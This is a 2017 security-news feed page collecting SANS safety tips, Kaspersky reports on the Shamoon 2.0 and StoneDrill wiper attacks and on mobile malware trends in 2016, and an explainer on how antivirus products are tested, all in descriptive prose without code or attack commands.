Malware RSS Feed


SANS Tip of the Day - Thu, 03/09/2017 - 00:00
Turn off Bluetooth if you are not using it on your computer or device. Not only does this make it more secure, but it also saves battery life.

Patch and Update

SANS Tip of the Day - Tue, 03/07/2017 - 00:00
One of the most effective ways you can protect your computer at home is to make sure both the operating system and your applications are patched and updated. Enable automatic updating whenever possible.

From Shamoon to StoneDrill

Malware Alerts - Mon, 03/06/2017 - 10:56

Beginning in November 2016, Kaspersky Lab observed a new wave of wiper attacks directed at multiple targets in the Middle East. The malware used in the new attacks was a variant of the infamous Shamoon worm that targeted Saudi Aramco and Rasgas back in 2012.

Dormant for four years, one of the most mysterious wipers in history has returned.

So far, we have observed three waves of attacks of the Shamoon 2.0 malware, activated on 17 November 2016, 29 November 2016 and 23 January 2017.

Also known as Disttrack, Shamoon is a highly destructive malware family that effectively wipes the victim machine. A group known as the Cutting Sword of Justice took credit for the Saudi Aramco attack by posting a Pastebin message on the day of the attack (back in 2012), and justified the attack as a measure against the Saudi monarchy.

The Shamoon 2.0 attacks seen in November 2016 targeted organizations in various critical and economic sectors in Saudi Arabia. Just like the previous variant, the Shamoon 2.0 wiper aims for the mass destruction of systems inside compromised organizations.

The new attacks share many similarities with the 2012 wave and now feature new tools and techniques. During the first stage, the attackers obtain administrator credentials for the victim’s network. Next, they build a custom wiper (Shamoon 2.0) which leverages these credentials to spread widely inside the organization. Finally, on a predefined date, the wiper activates, rendering the infected machines completely inoperable. It should be noted that the final stages of the attacks are completely automated, without the need for communication with the command and control center.

While investigating the Shamoon 2.0 attacks, Kaspersky Lab also discovered a previously unknown wiper malware which appears to be targeting organizations in Saudi Arabia. We’re calling this new wiper StoneDrill. StoneDrill has several “style” similarities to Shamoon, with multiple interesting factors and techniques to allow for the better evasion of detection. In addition to suspected Saudi targets, one victim of StoneDrill was observed on the Kaspersky Security Network (KSN) in Europe. This makes us believe the threat actor behind StoneDrill is expanding its wiping operations from the Middle East to Europe.

To summarize some of the characteristics of the new wiper attacks, for both Shamoon and StoneDrill:

  • Shamoon 2.0 includes a fully functional ransomware module, in addition to its common wiping functionality.
  • Shamoon 2.0 has both 32-bit and 64-bit components.
  • The Shamoon samples we analyzed in January 2017 do not implement any command and control (C&C) communication; previous ones included a basic C&C functionality that referenced local servers in the victim’s network.
  • StoneDrill makes heavy use of evasion techniques to avoid sandbox execution.
  • While Shamoon embeds Arabic-Yemen resource language sections, StoneDrill embeds mostly Persian resource language sections. Of course, we do not exclude the possibility of false flags.
  • StoneDrill does not use drivers during deployment (unlike Shamoon) but relies on memory injection of the wiping module into the victim’s preferred browser.
  • Several similarities exist between Shamoon and StoneDrill.
  • Multiple similarities were found between StoneDrill and previously analysed NewsBeef attacks.

We are releasing a full technical report that provides new insights into the Shamoon 2.0 and StoneDrill attacks, including:

  1. The discovery techniques and strategies we used for Shamoon and StoneDrill.
  2. Details on the ransomware functionality found in Shamoon 2.0. This functionality is currently inactive but could be used in future attacks.
  3. Details on the newly found StoneDrill functions, including its destructive capabilities (even with limited user privileges).
  4. Details on the similarities between malware styles and malware components’ source code found in Shamoon, StoneDrill and NewsBeef.

Our discovery of StoneDrill provides another dimension to the existing wave of wiper attacks against Saudi organizations that started with Shamoon 2.0 in November 2016. Compared to the new Shamoon 2.0 variants, the most significant difference is the lack of a disk driver used for direct access during the destructive step. Nevertheless, one does not necessarily need raw disk access to perform destructive functions at file level, which the malware implements quite successfully.

Of course, one of the most important questions here is the connection between Shamoon and StoneDrill. Both wipers appear to have been used against Saudi organizations during a similar timeframe of October-November 2016. Several theories are possible here:

  • StoneDrill is a less-used wiper tool, deployed in certain situations by the same Shamoon group.
  • StoneDrill and Shamoon are used by different groups which are aligned in their interests.
  • StoneDrill and Shamoon are used by two different groups which have no connection to each other and just happen to target Saudi organizations at the same time.

Taking all factors into account, our opinion is that the most likely theory is the second.

Additionally, StoneDrill appears to be connected with previously reported NewsBeef activity (LINK TO, which continues to target Saudi organizations. From this point of view, NewsBeef and StoneDrill appear to be continuously focused on targeting Saudi interests, while Shamoon is a flashy, come-and-go high impact tool.

In terms of attribution, while Shamoon embeds Arabic-Yemen resource language sections, StoneDrill embeds mostly Persian resource language sections. Geopolitical analysts would be quick to point out that Iran and Yemen are both players in the Iran-Saudi Arabia proxy conflict. Of course, we do not exclude the possibility of false flags.

Finally, many unanswered question remain in regards to StoneDrill and NewsBeef. The discovery of the StoneDrill wiper in Europe is a significant sign that the group is expanding its destructive attacks outside the Middle East. The target for the attack appears to be a large corporation with a wide area of activity in the petro-chemical sector, with no apparent connection or interest in Saudi Arabia.

As usual, we will continue to monitor the Shamoon, StoneDrill and NewsBeef attacks.

A presentation about StoneDrill will be given at the Kaspersky Security Analyst Summit Conference in April 2-6, 2017.

Kaspersky Lab products detect the Shamoon and StoneDrill samples as:


Indicators of Compromise Shamoon MD5s


StoneDrill MD5s


StoneDrill C2s


 Download full report


SANS Tip of the Day - Thu, 03/02/2017 - 00:00
Ransomware is a special type of malware. Once it infected your computer, it encrypts all of your files and demands you pay a ransome if you want your files back. Be suspicious of any emails trying to trick you into opening infected attachments or click on malicious links, common sense is your best defense. In addition. backups are often the only way you can recover from ransomware.

Mobile malware evolution 2016

Malware Alerts - Tue, 02/28/2017 - 06:05

The year in figures

In 2016, Kaspersky Lab detected the following:

  • 8,526,221 malicious installation packages
  • 128,886 mobile banking Trojans
  • 261,214 mobile ransomware Trojans
Trends of the year
  • Growth in the popularity of malicious programs using super-user rights, primarily advertising Trojans.
  • Distribution of malware via Google Play and advertising services.
  • Emergence of new ways to bypass Android protection mechanisms.
  • Growth in the volume of mobile ransomware.
  • Active development of mobile banking Trojans.
Malicious programs using super-user rights

The year’s most prevalent trend was Trojans gaining super-user privileges. To get these privileges, they use a variety of vulnerabilities that are usually patched in the newer versions of Android. Unfortunately, most user devices do not receive the latest system updates, making them vulnerable.

Root privileges provide these Trojans with almost unlimited possibilities, allowing them to secretly install other advertising applications, as well as display ads on the infected device, often making it impossible to use the smartphone. In addition to aggressive advertising and the installation of third-party software, these Trojans can even buy apps on Google Play.

This malware simultaneously installs its modules in the system directory, which makes the treatment of the infected device very difficult. Some advertising Trojans are even able to infect the recovery image, making it impossible to solve the problem by restoring to factory settings.

In addition to the secret installation of advertising apps, these Trojans can also install malware. We have registered installations of the modular trojan Backdoor.AndroidOS.Triada, which modified the Zygote processes. This allowed it to remain in the system and alter text messages sent by other apps, making it possible to steal money from the owner of the infected device. With super-user rights the Trojan can do almost anything, including substitute the URL in the browser.

Representatives of this class of malicious software have been repeatedly found in the official Google Play app store, for example, masquerading as a guide for Pokemon GO. This particular app was downloaded over half a million times and was detected as imitating a guide for Pokemon GO

Cybercriminals continue their use of Google Play

In Google Play in October and November, we detected about 50 new applications infected by, the new modification of According to installation statistics, many of them were installed more than 100,000 times. imitating a video player

Google Play was used to spread Trojans capable of stealing login credentials. One of them was Trojan-Spy.AndroidOS.Instealy.a which stole logins and passwords for Instagram accounts. Another was Trojan-PSW.AndroidOS.MyVk.a: it was repeatedly published in Google Play and targeted user data from the social networking site VKontakte.

Yet another example is Trojan-Ransom.AndroidOS.Pletor.d, distributed by cybercriminals under the guise of an app for cleaning operating systems. Usually, representatives of the Trojan-Ransom.AndroidOS.Pletor family encrypt files on the victim device, but the detected modification only blocked the gadget and demanded a ransom to unblock it.

Trojan-Ransom.AndroidOS.Pletor.d imitating a system cleaner

Bypassing Android’s protection mechanisms

Cybercriminals are constantly looking for ways to bypass Android’s new protection mechanisms. For instance, in early 2016, we found that some modifications of the Tiny SMS Trojan were able to use their own window to overlay a system message warning users about sending a text message to a premium rate number. As the owner of the smartphone cannot see the original text, they are unaware of what they are agreeing to, and send the message to the number specified by the attacker.

A similar method was used by Trojan-Banker.AndroidOS.Asacub to get administrator rights on the device. The Trojan hides the system request from the user, cheating the latter into granting it extra privileges. In addition, Asacub asks for the right to be the default SMS application, which allows it to steal messages even in newer versions of Android.

The authors of Trojan-Banker.AndroidOS.Gugi went even further. This malicious program is able to bypass two new Android 6 security mechanisms using only social engineering techniques. Without exploiting system vulnerabilities, Gugi bypasses the request for Android’s permission to display its window on top of other applications as well as the dynamic permission requirement for potentially dangerous actions.

Mobile ransomware

While the very first mobile encryptor Trojan really did encrypt user data on a device and demand money to decrypt them, current ransomware simply displays the ransom demand on top of other windows (including system windows), thus making it impossible to use the device.

The same principle was used by the most popular mobile ransom program in 2016 – Trojan-Ransom.AndroidOS.Fusob. Interestingly, this Trojan attacks users in Germany, the US and the UK, but avoids users from the CIS and some neighboring countries (once executed, it runs a check of the device language, after which it may stop working). The cybercriminals behind the Trojan usually demand between $100 and $200 to unblock a device. The ransom has to be paid using codes from pre-paid iTunes cards.

Yet another way to block devices is to use the Trojan-Ransom.AndroidOS.Congur family, which is popular in China. These Trojans change the PIN code for the gadget, or enable this safety function by setting their own PIN. To do this, the ransom program has to get administrator rights. The victim is told to contact the attackers via the QQ messenger to unblock the device.

Mobile banking Trojans continued to evolve through the year. Many of them gained tools to bypass the new Android security mechanisms and were able to continue stealing user information from the most recent versions of the OS. Also, the developers of mobile banking Trojans added more and more new features to their creations. For example, the Marcher family redirected users from financial to phishing sites over a period of several months.

In addition, many mobile banking Trojans include functionality for extorting money: upon receiving a command from a server, they can block the operation of a device with a ransom-demand window. We discovered that one modification of Trojan-Banker.AndroidOS.Faketoken could not only overlay the system interface but also encrypt user data.

It is also worth noting that the cybercriminals behind malicious programs for Android did not forget about one of the hottest topics of 2016 – IoT devices. In particular, we discovered the ‘attack-the-router’ Trojan Switcher which targets the Wi-Fi network an infected device is connected to. If the Trojan manages to guess the password to the router, it changes the DNS settings, implementing a DNS-hijacking attack.

A glance into the Dark Web. Contribution from INTERPOL’s Global Complex for Innovation.

The Dark Web provides a means for criminal actors to communicate and engage in commercial transactions, like buying and selling various products and services, including mobile malware kits. Vendors and buyers increasingly take advantage of the multiple security and business-oriented mechanisms put in place on Tor (The Onion Router) cryptomarkets, such as the use of cryptocurrencies, third-party administration services (escrow), multisignature transactions, encryption, reputation/feedback tracking and others. INTERPOL has looked into major Dark Web platforms and found that mobile malware is offered for sale as software packages (e.g. remote access trojans – RATs); individual solutions; sophisticated tools, like those developed by professional firms; or, on a smaller scale, as part of a ‘Bot as a Service’ model. Mobile malware is also a ‘subject of interest’ on vendor shops, forums and social media.


A number of mobile malware products and services are offered for sale on Dark Web marketplaces. Mobile malware is often advertised as part of a package, which can include, for instance, remote access trojans (RATs), phishing pages, or ‘hacking’ software bundles which consist of forensic and password-breaking tools. Individual/one piece tools are also offered for sale. For example, DroidJack was offered by different vendors on four major marketplaces. This popular Android RAT is sold openly on the Clearnet for a high price, but on the Dark Web the price is much lower.

Both variants (package and individual) sometimes come with ‘how-to’ guides which explain the methods for hacking popular operating systems, such as Android and iOS. More sophisticated tools are also advertised on the Dark Web, such as Galileo, a remote control system developed by the Italian IT company Hacking Team in order to access remotely and then exploit devices that run Android, iOS, BlackBerry, Windows or OS X. Another example is the source code for Acecard. This malware is known for adding overlay screens on top of mobile banking applications and then forwarding the user’s login credentials to a remote attacker. It can also access SMS, from which potentially useful two-factor authentication codes can be obtained by fraudsters.

The Android bot rent service (BaaS, or Bot as a Service) is also available for purchase. The bot can be used to gather financial information from Android phones and comes with many features and documentation, available in both Russian and English. More features and specifications can be developed on request. This service can cost up to USD 2,500 per month or USD 650 per week.

Mobile phishing products for obtaining financial information, tools that can control phones through Bluetooth or change their IMEI (International Mobile Equipment Identity), and various Android RATs that focus on intercepting text messages, call logs and locations, and accessing the device’s camera, are also displayed on Dark Web marketplaces.

Vendor shops, forums and social media

Vendor shops are standalone platforms created by a single or group of vendors who have built up a customer base on a marketplace and then decided to start their own business. Generally, these shops do not have forums and merely advertise one specific type of illicit item, such as drugs or stolen personal information, but they also sell mobile malware (DroidJack). Tutorials are sometimes attached to mobile malware products, and information on which tools are fit for purpose and how to install and utilize them can also be found in forum threads and on social media. Furthermore, a Tor hidden service focused on hacking news was found to contain information on how to set up Dendroid mobile malware. This RAT, which is capable of intercepting SMS messages, downloading pictures and opening a dialogue box to phish passwords, dates from 2014 but was still offered in 2016 as part of several advertisements (packages) on different marketplaces.

Due to its robust anonymity, OPSEC techniques, low prices and client-oriented strategy, the Dark Web remains an attractive medium for conducting illicit businesses and activities, and one where specific crime areas may arise or grow in the future. The development of innovative technical solutions (in close cooperation with academia, research institutes and private industry), international cooperation and capacity building are fundamental pillars in the fight against the use of Dark Web by criminals.


In 2016, the number of malicious installation packages grew considerably, amounting to 8,526,221 – three times more than the previous year. As a comparison, from 2004 to 2013 we detected over 10,000,000 malicious installation packages; in 2014 the figure was nearly 2.5 million.

From the beginning of January till the end of December 2016, Kaspersky Lab registered nearly 40 million attacks by malicious mobile software and protected 4,018,234 unique users of Android-based devices (vs 2.6 million in 2015).

The number of attacks blocked by Kaspersky Lab solutions, 2016

The number of users protected by Kaspersky Lab solutions, 2016

Geography of mobile threats

Attacks by malicious mobile software were recorded in more than 230 countries and territories.

The geography of mobile threats by number of attacked users, 2016

TOP 10 countries by the percentage of users attacked by mobile malware

Country* %** 1 Bangladesh 50.09% 2 Iran 46.87% 3 Nepal 43.21% 4 China 41.85% 5 Indonesia 40.36% 6 Algeria 36.62% 7 Nigeria 35.61% 8 Philippines 34.97% 9 India 34.18% 10 Uzbekistan 31.96%

* We excluded those countries in which the number of users of Kaspersky Lab mobile security products over the reported period was less than 25,000.
** The percentage of attacked unique users as a percentage of all users of Kaspersky Lab’s mobile security products in the country.

China, which topped this rating in 2015, continued to lead the way in the first half of 2016 but dropped to fourth overall for the year, being replaced by Bangladesh, which led similar ratings throughout 2016. More than half of all users of Kaspersky Lab mobile security products in Bangladesh encountered mobile malware.

The most widespread mobile malware targeting users in Bangladesh in 2016 were representatives of advertising Trojans belonging to the Ztorg and Iop families, as well as advertising programs of the Sprovider family. This malware, as well as representatives of the AdWare.AndroidOS.Ewind and AdWare.AndroidOS.Sprovider families were most frequently found on user devices in all the countries in the Top 10, except China and Uzbekistan.

In China, a significant proportion of the attacks involved the Backdoor.AndroidOS.Fakengry.h and Backdoor.AndroidOS.GinMaster.a families as well as representatives of RiskTool.AndroidOS.

Most of the attacks on users in Uzbekistan were carried out by Trojan-SMS.AndroidOS.Podec.a and Trojan-FakeAV.AndroidOS.Mazig.b. Representatives of the advertising Trojans Iop and Ztorg, as well as the advertising programs of the Sprovider family were also quite popular in the country.

Types of mobile malware

Starting this year, we calculate the distribution of mobile software by type, based on the number of detected installation packages, rather than modifications.

Distribution of new mobile malware by type in 2015 and 2016

Over the reporting period, the number of new RiskTool files detected grew significantly – from 29% in 2015 to 43% in 2016. At the same time, the share of new AdWare files fell – 13% vs 21% in the previous year.

For the second year running, the percentage of detected SMS Trojan installation packages continued to decline – from 24% to 11%, which was the most notable fall. Despite this, we cannot say that the SMS Trojan threat is no longer relevant; in 2016, we detected nearly 700,000 new installation packages.

The most considerable growth was shown by Trojan-Ransom: the share of this type of malware among all installation packages detected in 2016 increased almost 6.5 times to 4%. This growth was caused by the active distribution of two families of mobile ransomware – Trojan-Ransom.AndroidOS.Fusob and Trojan-Ransom.AndroidOS.Congur.

Top 20 malicious mobile programs

Please note that the ranking of malicious programs below does not include potentially unwanted programs such as RiskTool or AdWare (advertising programs).

Detection %* 1 DangerousObject.Multi.Generic 67.93% 2 Backdoor.AndroidOS.Ztorg.c 6.58% 3 Trojan-Banker.AndroidOS.Svpeng.q 5.42% 4 Trojan.AndroidOS.Iop.c 5.25% 5 Backdoor.AndroidOS.Ztorg.a 4.83% 6 3.44% 7 Trojan.AndroidOS.Ztorg.t 3.21% 8 Trojan.AndroidOS.Hiddad.v 3.13% 9 Trojan.AndroidOS.Ztorg.a 3.11% 10 Trojan.AndroidOS.Boogr.gsh 2.51% 11 Trojan.AndroidOS.Muetan.b 2.40% 12 Trojan-Ransom.AndroidOS.Fusob.pac 2.38% 13 Trojan-Ransom.AndroidOS.Fusob.h 2.35% 14 Trojan.AndroidOS.Sivu.c 2.26% 15 2.23% 16 Trojan.AndroidOS.Ztorg.aa 2.16% 17 2.12% 18 Trojan.AndroidOS.Ztorg.i 1.95% 19 1.85% 20 Trojan-Dropper.AndroidOS.Triada.d 1.78%

* Percentage of users attacked by the malware in question, relative to all users attacked.

First place in the Top 20 is occupied by DangerousObject.Multi.Generic (67.93%), used in malicious programs detected by cloud technologies. Cloud technologies work when the antivirus database contains neither the signatures nor heuristics to detect a malicious program. This is basically how the very latest malware is detected.

In second place was Backdoor.AndroidOS.Ztorg.c, the advertising Trojan using super-user rights to secretly install various applications. Noticeably, the 2016 rating included 16 advertising Trojans (highlighted in blue in the table), which is four more than in 2015.

The most popular mobile banking Trojan in 2016 was Trojan-Banker.AndroidOS.Svpeng.q in third place. The Trojan became so widespread after being distributing via the AdSense advertising network. Due to a vulnerability in the Chrome browser, the user was not required to take any action to download the Trojan on the device. It should be noted that more than half of the users attacked by mobile banking Trojans in 2016 encountered representatives of the Svpeng family. They use phishing windows to steal credit card data and also attack SMS banking systems.

Representatives of the Fusob family – Trojan-Ransom.AndroidOS.Fusob.pac and Trojan-Ransom.AndroidOS.Fusob.h – claimed 12th and 13th respectively. These Trojans block a device by displaying their own window and demanding a ransom to remove it.

Mobile banking Trojans

In 2016, we detected 128,886 installation packages of mobile banking Trojans, which is 1.6 times more than in 2015.

Number of installation packages of mobile banking Trojans detected by Kaspersky Lab solutions in 2016

In 2016, 305,543 users in 164 countries were attacked by mobile banking Trojans vs 56,194 users in 137 countries the previous year.

Geography of mobile banking threats in 2016 (number of users attacked)

Top 10 countries by the percentage of users attacked by mobile banking Trojans relative to all attacked users

Country* %** 1 Russia 4.01 2 Australia 2.26 3 Ukraine 1.05 4 Uzbekistan 0.70 5 Tajikistan 0.65 6 The Republic of Korea 0.59 7 Kazakhstan 0.57 8 China 0.54 9 Belarus 0.47 10 Moldova 0.39

* We excluded those countries in which the number of users of Kaspersky Lab mobile security products over the reported period was less than 25,000.
** Percentage of unique users attacked by mobile banking Trojans, relative to all users of Kaspersky Lab’s mobile security products in the country.

In Russia – ranked first in the Top 10 – mobile banking Trojans were encountered by 4% of mobile users. This is almost two times higher than in second-placed Australia. The difference is easily explained by the fact that the most popular mobile banking Trojan Svpeng was mostly spread in Russia. Representatives of the Asacub and Faketoken families were also popular there.

In Australia, the Trojan-Banker.AndroidOS.Acecard and Trojan-Banker.AndroidOS.Marcher families were responsible for most infection attempts. In South Korea (7th place) the most popular banking Trojans belonged to the Trojan-Banker.AndroidOS.Wroba family.

In the other countries of the Top 10, the most actively distributed mobile banking Trojan families were Trojan-Banker.AndroidOS.Faketoken and Trojan-Banker.AndroidOS.Svpeng. The representatives of the latter were especially widespread in 2016, with more than half of mobile users encountering them. As we have already mentioned, this was the result of them being distributed via the AdSense advertising network and being loaded stealthily via a mobile browser vulnerability.

The Trojan-Banker.AndroidOS.Faketoken family was in second place in this rating. Some of its modifications were capable of attacking more than 2,000 financial organizations.

Third place was occupied by the Trojan-Banker.AndroidOS.Asacub family, which attacked more than 16% of all users affected by mobile bankers. These Trojans are mainly distributed in Russia, often via SMS spam.

Mobile Trojan-Ransom

In 2016, the volume of mobile ransomware increased considerably both in the number of installation packages detected and in the number of users attacked. Over the reporting period, we detected 261,214 installation packages, which is almost 8.5 times more than in 2015.

Number of mobile Trojan-Ransomware installation packages detected by Kaspersky Lab
(Q1 2016 – Q4 2016)

In 2016, 153,258 unique users from 167 countries were attacked by Trojan-Ransom programs; this is 1.6 times more than in 2015.

Interestingly, a large number of installation packages in the first two quarters of 2016 belonged to the Trojan-Ransom.AndroidOS.Fusob family, though there was a fall in activity in the third quarter. The subsequent growth in the fourth quarter was fueled by an increase in activity by the Trojan-Ransom.AndroidOS.Congur family: it includes relatively simple Trojans that either block a device using their own window, or change the device’s password.

Geography of mobile ransomware threats in 2016 (number of users attacked)

TOP 10 countries attacked by Trojan-Ransom malware – share of users relative to all attacked users in the country.

Country* %** 1 Germany 2.54 2 USA 2.42 3 Canada 2.34 4 Switzerland 1.88 5 Kazakhstan 1.81 6 United Kingdom 1.75 7 Italy 1.63 8 Denmark 1.29 9 Mexico 1.18 10 Australia 1.13

* We excluded those countries in which the number of users of Kaspersky Lab mobile security products over the reported period was less than 25,000.
** Percentage of unique users attacked by mobile Trojan ransomware, relative to all users of Kaspersky Lab’s mobile security products in the country.

The largest percent of mobile users attacked by ransomware was in Germany – over 2.5%. In almost all the countries in this ranking, representatives of the Trojan-Ransom.AndroidOS.Fusob and Trojan-Ransom.AndroidOS.Svpeng families were particularly popular. Kazakhstan (5th place) was the only exception – the most frequently used ransom programs there were various modifications of the Trojan-Ransom.AndroidOS.Small family.

More information about these three families of mobile Trojan ransomware can be found in a dedicated study.


In 2016, the growth in the number of advertising Trojans capable of exploiting super-user rights continued. Throughout the year it was the No. 1 threat, and we see no sign of this trend changing. Cybercriminals are taking advantage of the fact that most devices do not receive OS updates (or receive them late), and are thus vulnerable to old, well-known and readily available exploits.

This year, we will continue to closely monitor the development of mobile banking Trojans: the developers of this class of malware are the first to use new technologies and are always looking for ways to bypass security mechanisms implemented in the latest versions of mobile operating systems.

In 2016, one of the most controversial issues was the safety of IoT devices. Various Internet-connected ‘smart’ devices are becoming increasingly popular, though their level of security is fairly low. Also in 2016, we discovered an ‘attack-the-router’ Trojan. We see that the mobile landscape is getting a little crowded for cybercriminals, and they are beginning to interact more with the world beyond smartphones. Perhaps in 2017 we will see major attacks on IoT components launched from mobile devices.

How Security Products are Tested – Part 1

Malware Alerts - Mon, 02/27/2017 - 06:56

The demand for tests appeared almost simultaneously with the development of the first antivirus programs – in the mid-to-late 1990s. Demand created supply: test labs at computer magazines started to measure the effectiveness of security solutions with the help of self-made methodologies, and later an industry of specialized companies emerged with a more comprehensive approach to testing methods.

The first primitive tests scanning huge collections of malicious and supposedly malicious files taken from everywhere were rightfully criticized first and foremost by the vendors. Such tests were characterized by inconsistent and unreliable results, and few people trusted them.

More than 20 years have passed since then. In that time, protection solutions have continuously evolved and become more and more efficient thanks to new technologies. However, the threats have developed too. In their turn, the laboratories have been steadily improving their testing methods, devising the most reliable and accurate procedures of measuring the work of security solutions in different environments. This process is neither cheap nor easy, and that’s why we now have a situation where the quality of testing depends on the financial standing of a laboratory and its accumulated expertise.

True cybersecurity? Most trusted, most awarded. @avtestorg annual awards go to:

— Eugene Kaspersky (@e_kaspersky) 3 февраля 2017 г.

When it comes to the costs of testing, the main question is: cui prodest? (Lat. who benefits?) And this is one of those rare cases where high-quality work benefits everyone: both vendors and customers. The fact is that independent testing is the only way to evaluate the effectiveness of a security solution and to compare it with its competitors. Other methods simply do not exist. For a potential customer, testing plays an important role in understanding what kind of product best meets their needs. For vendors it provides an opportunity to keep up to date with the industry; otherwise, they may not notice when their product falls behind the competition, or development is heading in the wrong direction. This practice is also used in other industries, for example, EURO NCAP independent security tests.

However, the world is changing, and new solutions are emerging for old problems. The cybersecurity industry welcomes products based on modern approaches, such as machine learning. The potential opportunities are breathtaking, although it may take years before we see them implemented effectively. Of course, in their marketing materials the vendors of so-called next-gen anti-malware software are keen to talk about the incredible capabilities of their products, but we shouldn’t believe everything they say – it’s better to continue comparing solutions based on test results.

Basic testing methodologies

The question “How do you test?” was asked by the testers in the early years of the industry. They still ask themselves this question to this day. Testing methodologies have evolved in line with the evolution of cyber threats and security solutions. It all started with the simplest method – an on-demand scan.

On-demand scan (ODS). The test lab collects all types of malicious programs (mainly files already infected with malware – nowadays it’s mostly with Trojans), adds them to a folder on the hard disk, and then launches the security product in question to test it against the entire collection. The more the product catches, the better it is. Sometimes in the course of testing, files are copied from one folder to another, which is slightly closer to a real work scenario.

At one time this method used to be enough, but now the lion’s share of advanced security technologies don’t work with this type of testing, meaning it’s not possible to assess how effectively solutions actually counter the latest threats. Nevertheless, ODS is still used, often in combination with more advanced methods.

On-execute test. This is the next stage in the development of test methods. A collection of samples is copied and launched on a machine where the security software is running, and the reaction of the security solution is recorded. This was once viewed as a very advanced technique, but its shortcomings were soon revealed in practice. A modern cyber-attack is carried out in several stages. A malicious file is just one part of that attack and isn’t intended to function on its own. For instance, the sample may be waiting for command-line parameters, require a specific environment (e.g., a specific browser), or it may be a module in the form of a DLL that connects to the main Trojan, rather than running on its own.

Real-world test (RW). This is the most complicated test method, but also the closest to reality, imitating the full cycle of infecting a system. The testers open a malicious file delivered via email on a clean system with the security solution installed, or via a browser following a real malicious link to check whether the whole infection chain works, or if the solution being tested was able to stop the process at some stage.

These types of tests reveal various problems that security software may experience when working in the real world with real threats.

However, this method of testing requires serious preparatory work. Firstly, full-scale testing of a hundred or more samples requires a large number of machines, or a lot of time – something that few laboratories can afford. Secondly, many of today’s Trojans can tell if they are being launched in a virtual environment and won’t work, hindering the efforts of any researchers trying to perform an analysis. Therefore, in order to obtain the most reliable results, the test laboratory must use physical computers, rebooting the system after running each malware sample. Or to use virtual machines, but be more careful while selecting samples for testing.

Another difficult task is generating extensive databases of malicious links. Many of them are used just once or work with restrictions (for example, only in certain regions). And the quality of the RW test is highly dependent on how good the laboratory is at finding such links and whether it handles them correctly. Obviously, there is no point if one product works when a link is opened, while the others cannot be tested because the link has subsequently “died”. To achieve accurate results, there needs to be a large number of these links, but providing them can be difficult.

Behavior or proactive test. According to this technique, a security solution is tested using samples that are unknown to it. To do this, the experts install the test product and do not update it for several months. A collection of malicious programs that appeared after the last update is then used to perform the ODS and on-execute tests. Some test companies pack or obfuscate known threats to test the security solution’s ability to identify malicious behavior. It is quite difficult to conduct this sort of test properly. For example, some laboratories disable updates by blocking Internet access on the test machine, thus depriving the security solution access to the cloud. This may cause some technologies to fail, meaning the products are not being tested on an even playing field and undermining the relevance of the test.

Removal or remediation (test for the complete removal of malware). This checks the ability of a security solution to treat the system, i.e., clean autorun keys, remove a task scheduler and other traces of malware activity. This is an important test, because poor treatment may cause problems when booting or using the OS or, what is worse, the restoration of the malware in the system. During testing, a “clean” system is infected with a malicious program from the collection of malware samples. The computer is then rebooted, and a security solution with the latest updates is installed. The majority of testers perform the test to check the quality of a solution’s treatment; it may be in the form of a separate test or as part of an RW test.

Performance test. This test evaluates how effectively a security solution uses the system resources. To do this, the speed of various operations are measured with the security solution installed and running. These operations include system boot, file copying, archiving and decompression, and the launching of applications. Test packets simulating realistic user work scenarios in the system are also used.

False positive test. This test is necessary to determine the reliability of the final evaluation. Obviously, an anti-malware program that detects all programs as malicious, will receive scores of 100% in the protection category, but will be useless for the user. Therefore, its reaction to legitimate applications has to be checked. To do this, a separate collection of popular software installation files is created and tested using different scenarios.

Feedback. This is not a test methodology, but rather the most important stage of any test, without which the results cannot be verified. After performing all the tests, the laboratory sends the preliminary results achieved by the product to the respective vendor, so that they can check and reproduce the findings and identify any errors. This is very important because a test laboratory simply doesn’t have the resources to check even every hundredth case, and errors are always possible. And those errors are not necessarily caused by the methodology. For example, during an RW test an application can successfully penetrate a machine but not perform any malicious actions because it is intended for a different region, or it is not initially malicious, being used instead for advertising purposes. However, the program was installed and the security solution didn’t block it, resulting in a reduced score.

At the same time, a security solution is designed to block malicious actions. In this case, however, no malicious actions were performed, and the anti-malware program worked as planned by the vendor. It is only possible to handle such cases by analyzing the code of the sample and its behavior; in most cases, the test company doesn’t have the resources for that and the vendor’s help is required.

Specialized tests

Another layer of methodologies are those used for in-depth testing of specific types of threats or specific security technologies. Many customers need to know which solution is most effective against encryptors, for example, or which product offers online banking systems the best protection. An overall evaluation of a security solution is not very informative: it only shows that one product is “no worse than the others”. This is not enough, so a number of test laboratories carry out specialized tests.

Exploits. Counteracting exploits is more difficult than detecting malware samples and not all security solutions can do it successfully. To assess exploit prevention technologies, laboratories use RW tests: the testers collect links to exploit packs, follow them on a clean machine, record the traffic and reproduce it for all the anti-malware solutions in a test. In order to make the experiment as pure as possible, some companies, in addition to real exploit packs, create their own exploits using frameworks like Metasploit. This makes it possible to test a security solution’s reaction to the exploitation of software vulnerabilities using unknown code.

Financial threats. Internet banking and bank client systems are very popular vectors of attack with cybercriminals because they offer direct financial benefits. A number of specific technologies are used, for example, substitution of web page content or remote system management, and it is necessary to check how well a security solution counteracts them. Also, many vendors offer specialized security technologies to protect against financial threats (for example, our SafeMoney); their effectiveness is also checked by these tests.

Special platforms. The vast majority of tests are carried out on the most common platform – an up-to-date version of Microsoft Windows for desktops. However, users are sometimes interested in the effectiveness of a security solution on other platforms: Android, Linux, Mac OS, Windows servers, a mobile operating system, or even earlier Windows versions (e.g., Windows XP still works on most ATMs, and banks are unlikely to upgrade any time soon). These tests are usually carried out according to the simplest methods, because demand for them is minimal.

Types of tests

Besides methodology, tests differ by type. A security solution can be tested independently of competitors (certification) or together with competitors (comparative test). Certification only determines whether a solution combats existing threats effectively. Comparative tests take up more of a laboratory’s resources, but offer the vendor and potential customer more information.

Tests also differ in terms of their frequency and the methods used to calculate the results. Most test companies carry out regular tests that are performed every one to six months. The results of each test are calculated independently: the same solution can be scored highly in one test, while in the next test it may get a low score, or vice versa. In addition to the features of the product itself, this depends on the collections used or changes to the methodology.

In the case of continuous testing, security solutions are also tested at regular intervals, but scores are given cumulatively, for example, every six months following monthly testing, or both cumulatively and for each test. Of all the numerous tests conducted, the most indicative for the consumer and the most important for the vendor are continuous tests. Only the results of “a long distance race” make it possible to calculate the results obtained from different product versions with a variety of collections and to achieve the most relevant product evaluation.

The main thing about continuous tests is that only their results allow to both evaluate the effectiveness of previous and current versions of the product and understand how it is likely to behave in the foreseeable future. High scores in annual or longer testing suggest that constant work is being done on the product. It is not only receiving database updates; the developers are closely watching the threat landscape and responding to changes.

Market players

